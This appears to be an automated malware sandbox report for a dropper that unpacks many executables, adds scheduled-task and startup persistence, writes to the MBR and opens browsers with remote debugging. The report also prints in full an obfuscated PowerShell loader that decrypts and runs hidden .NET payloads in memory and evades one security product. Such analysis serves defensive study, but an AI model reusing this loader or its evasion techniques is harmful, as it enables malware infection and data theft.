7ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 7aencsM.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3400 schtasks.exe 5908 schtasks.exe 1144 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4904 09c586796227f25da3e37d9203d0c48e.exe 4904 09c586796227f25da3e37d9203d0c48e.exe 1484 skotes.exe 1484 skotes.exe 4556 c379a1bd05.exe 4556 c379a1bd05.exe 4556 c379a1bd05.exe 4556 c379a1bd05.exe 3832 Fe36XBk.exe 3832 Fe36XBk.exe 4168 Bjkm5hE.exe 4168 Bjkm5hE.exe 4168 Bjkm5hE.exe 4168 Bjkm5hE.exe 1292 powershell.exe 1292 powershell.exe 4676 powershell.exe 4676 powershell.exe 3964 powershell.exe 3964 powershell.exe 4864 ViGgA8C.exe 4864 ViGgA8C.exe 3964 powershell.exe 2368 DTQCxXZ.exe 2368 DTQCxXZ.exe 2368 DTQCxXZ.exe 2368 DTQCxXZ.exe 1504 skotes.exe 1504 skotes.exe 4864 ViGgA8C.exe 4864 ViGgA8C.exe 4864 ViGgA8C.exe 1816 d2YQIJa.exe 1816 d2YQIJa.exe 1816 d2YQIJa.exe 1816 d2YQIJa.exe 1816 d2YQIJa.exe 1816 d2YQIJa.exe 952 sHN20me.exe 952 sHN20me.exe 952 sHN20me.exe 952 sHN20me.exe 952 sHN20me.exe 952 sHN20me.exe 1252 spoDnGT.exe 1252 spoDnGT.exe 1252 spoDnGT.exe 1252 spoDnGT.exe 1252 spoDnGT.exe 1252 spoDnGT.exe 4172 Ta3ZyUR.exe 4172 Ta3ZyUR.exe 4172 Ta3ZyUR.exe 4172 Ta3ZyUR.exe 3016 qFqSpAp.exe 3016 qFqSpAp.exe 3016 qFqSpAp.exe 3016 qFqSpAp.exe 952 m5UP2Yj.exe 952 m5UP2Yj.exe 1520 jROrnzx.exe 1520 jROrnzx.exe 1520 jROrnzx.exe 1520 jROrnzx.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 4864 ViGgA8C.exe Token: SeShutdownPrivilege 2064 chrome.exe Token: SeCreatePagefilePrivilege 2064 chrome.exe Token: SeShutdownPrivilege 2064 chrome.exe Token: SeCreatePagefilePrivilege 2064 chrome.exe Token: SeShutdownPrivilege 2064 chrome.exe Token: SeCreatePagefilePrivilege 2064 chrome.exe Token: SeShutdownPrivilege 2064 chrome.exe Token: SeCreatePagefilePrivilege 2064 chrome.exe Token: SeShutdownPrivilege 2064 chrome.exe Token: SeCreatePagefilePrivilege 2064 chrome.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeShutdownPrivilege 2064 chrome.exe Token: SeCreatePagefilePrivilege 2064 chrome.exe Token: SeShutdownPrivilege 2064 chrome.exe Token: SeCreatePagefilePrivilege 2064 chrome.exe Token: SeDebugPrivilege 5328 powershell.exe Token: SeDebugPrivilege 5592 powershell.exe Token: SeDebugPrivilege 3972 TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Token: SeDebugPrivilege 5764 powershell.exe Token: SeDebugPrivilege 5984 powershell.exe Token: SeDebugPrivilege 5384 powershell.exe -
Suspicious use of FindShellTrayWindow 55 IoCs
pid Process 4904 09c586796227f25da3e37d9203d0c48e.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2064 chrome.exe 2988 c4a7457852.exe 2988 c4a7457852.exe 2988 c4a7457852.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe 6024 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2988 c4a7457852.exe 2988 c4a7457852.exe 2988 c4a7457852.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4904 wrote to memory of 1484 4904 09c586796227f25da3e37d9203d0c48e.exe 84 PID 4904 wrote to memory of 1484 4904 09c586796227f25da3e37d9203d0c48e.exe 84 PID 4904 wrote to memory of 1484 4904 09c586796227f25da3e37d9203d0c48e.exe 84 PID 1484 wrote to memory of 1764 1484 skotes.exe 85 PID 1484 wrote to memory of 1764 1484 skotes.exe 85 PID 1484 wrote to memory of 1764 1484 skotes.exe 85 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1764 wrote to memory of 4556 1764 c379a1bd05.exe 86 PID 1484 wrote to memory of 2740 1484 skotes.exe 91 PID 1484 wrote to memory of 2740 1484 skotes.exe 91 PID 1484 wrote to memory of 2740 1484 skotes.exe 91 PID 1484 wrote to memory of 3044 1484 skotes.exe 92 PID 1484 wrote to memory of 3044 1484 skotes.exe 92 PID 1484 wrote to memory of 3044 1484 skotes.exe 92 PID 1484 wrote to memory of 2980 1484 skotes.exe 93 PID 1484 wrote to memory of 2980 1484 skotes.exe 93 PID 1484 wrote to memory of 2980 1484 skotes.exe 93 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 2980 wrote to memory of 4168 2980 Bjkm5hE.exe 94 PID 1484 wrote to memory of 3832 1484 skotes.exe 97 PID 1484 wrote to memory of 3832 1484 skotes.exe 97 PID 1484 wrote to memory of 3832 1484 skotes.exe 97 PID 1484 wrote to memory of 1292 1484 skotes.exe 98 PID 1484 wrote to memory of 1292 1484 skotes.exe 98 PID 1484 wrote to memory of 1292 1484 skotes.exe 98 PID 1292 wrote to memory of 1696 1292 powershell.exe 100 PID 1292 wrote to memory of 1696 1292 powershell.exe 100 PID 1292 wrote to memory of 1696 1292 powershell.exe 100 PID 1696 wrote to memory of 1156 1696 cmd.exe 102 PID 1696 wrote to memory of 1156 1696 cmd.exe 102 PID 1696 wrote to memory of 1156 1696 cmd.exe 102 PID 1696 wrote to memory of 4676 1696 cmd.exe 103 PID 1696 wrote to memory of 4676 1696 cmd.exe 103 PID 1696 wrote to memory of 4676 1696 cmd.exe 103 PID 1484 wrote to memory of 4864 1484 skotes.exe 104 PID 1484 wrote to memory of 4864 1484 skotes.exe 104 PID 1484 wrote to memory of 4864 1484 skotes.exe 104 PID 4676 wrote to memory of 3964 4676 powershell.exe 106 PID 4676 wrote to memory of 3964 4676 powershell.exe 106 PID 4676 wrote to memory of 3964 4676 powershell.exe 106 PID 1484 wrote to memory of 2368 1484 skotes.exe 107 PID 1484 wrote to memory of 2368 1484 skotes.exe 107 PID 1484 wrote to memory of 2368 1484 skotes.exe 107 PID 2740 wrote to memory of 4620 2740 13Z5sqy.exe 108 PID 2740 wrote to memory of 4620 2740 13Z5sqy.exe 108 PID 2740 wrote to memory of 4620 2740 13Z5sqy.exe 108 PID 1484 wrote to memory of 4860 1484 skotes.exe 109 PID 1484 wrote to memory of 4860 1484 skotes.exe 109 PID 1484 wrote to memory of 4860 1484 skotes.exe 109 PID 2740 wrote to memory of 4620 2740 13Z5sqy.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\09c586796227f25da3e37d9203d0c48e.exe"C:\Users\Admin\AppData\Local\Temp\09c586796227f25da3e37d9203d0c48e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\1014060001\c379a1bd05.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\c379a1bd05.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\1014060001\c379a1bd05.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\c379a1bd05.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 9684⤵
- Program crash
PID:2812
-
-
-
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4620
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 9644⤵
- Program crash
PID:3560
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4860 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5016
-
-
-
C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:1344
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 9564⤵
- Program crash
PID:2752
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4160 -
C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 9644⤵
- Program crash
PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5104 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
PID:2496 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2064 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff24fccc40,0x7fff24fccc4c,0x7fff24fccc586⤵PID:4316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1900 /prefetch:26⤵PID:1920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1796,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2020 /prefetch:36⤵PID:4828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:86⤵PID:2720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:16⤵
- Uses browser remote debugging
PID:1356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:16⤵
- Uses browser remote debugging
PID:2260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4224,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4308 /prefetch:16⤵
- Uses browser remote debugging
PID:4464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4480,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4684 /prefetch:86⤵PID:3604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4728 /prefetch:86⤵PID:1288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4864,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4700 /prefetch:86⤵PID:968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,14902384966183243309,7265085238939916733,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4644 /prefetch:86⤵PID:4812
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6024 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff24fd46f8,0x7fff24fd4708,0x7fff24fd47186⤵
